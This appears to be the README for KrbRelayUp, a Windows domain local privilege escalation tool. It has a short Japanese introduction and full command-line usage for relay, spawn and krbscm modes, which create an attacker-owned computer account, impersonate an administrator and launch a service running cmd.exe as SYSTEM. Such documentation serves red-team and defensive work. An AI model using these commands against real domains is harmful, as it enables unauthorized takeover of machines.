次の攻撃プリミティブの悪用を合理化するために、RubeusとKrbRelayのいくつかの機能(および謝辞セクションの他のいくつかの名誉ある言及)の単純なラッパー:
これは基本的に、LDAP署名が適用されていないWindowsドメイン環境(デフォルト設定)でのユニバーサルな修正なしのローカル権限昇格です。
更新: この攻撃を手動で実行する方法についての@ an0n_r0による優れた記事があります(この攻撃パスの元のツールを使用: PowerMad / SharpMad、KrbRelay、Rubeus、SCMUACBypass)
KrbRelayUp - Relaying you to SYSTEM RELAY: Usage: KrbRelayUp.exe relay -d FQDN -cn COMPUTERNAME [-c] [-cp PASSWORD | -ch NTHASH] -d (--Domain) FQDN of domain. -c (--CreateNewComputerAccount) Create new computer account for RBCD. Will use the current authenticated user. -cn (--ComputerName) Name of attacker owned computer account for RBCD. (deafult=KRBRELAYUP$ [if -c is enabled]) -cp (--ComputerPassword) Password of computer account for RBCD. (deafult=RANDOM [if -c is enabled]) -ch (--ComputerPasswordHash) Password NT hash of computer account for RBCD. (Optional) -p (--Port) Port for Com Server (default=12345) SPAWN: Usage: KrbRelayUp.exe spawn -d FQDN -cn COMPUTERNAME [-cp PASSWORD | -ch NTHASH] <-i USERTOIMPERSONATE> -d (--Domain) FQDN of domain. -cn (--ComputerName) Name of attacker owned computer account for RBCD. -cp (--ComputerPassword) Password of computer account for RBCD. -ch (--ComputerPasswordHash) Password NT hash of computer account for RBCD. (Optional) -i (--Impersonate) User to impersonate. should be a local admininstrator in the target computer. (default=Administrator) -s (--ServiceName) Name of the service to be created. (default=KrbSCM) -sc (--ServiceCommand) Service command [binPath]. (default = spawn cmd.exe as SYSTEM) KRBSCM: Usage: KrbRelayUp.exe krbscm <-s SERVICENAME> <-sc SERVICECOMMANDLINE> -s (--ServiceName) Name of the service to be created. (default=KrbSCM) -sc (--ServiceCommand) Service command [binPath]. (default = spawn cmd.exe as SYSTEM)